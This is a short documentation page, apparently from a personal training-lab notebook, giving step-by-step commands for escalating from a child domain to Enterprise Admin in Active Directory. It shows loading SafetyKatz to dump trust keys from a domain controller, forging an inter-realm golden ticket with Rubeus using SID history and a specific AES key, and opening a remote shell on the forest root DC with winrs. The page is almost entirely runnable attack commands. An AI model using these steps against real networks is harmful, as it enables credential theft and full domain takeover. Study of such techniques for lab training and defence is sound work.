> For the complete documentation index, see [llms.txt](https://omar-4.gitbook.io/omar-docs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://omar-4.gitbook.io/omar-docs/attacks/escalate-privileges-to-enterprise-admin.md).

# Escalate Privileges to Enterprise Admin

**First You should Dump the Security ids for the domain and the krbtgt hash from the DC**

```
c:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe lsadump::trust /patch  "exit"
```

Let's create the inter-realm TGT and inject.

```
C:\AD\Tools\Rubeus.exe golden /user:Administrator /id:500 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /netbios:dcorp /ptt
```

Now , we have Access to mcrop-dc

```
winrs -r:mcorp-dc.moneycorp.local cmd
```
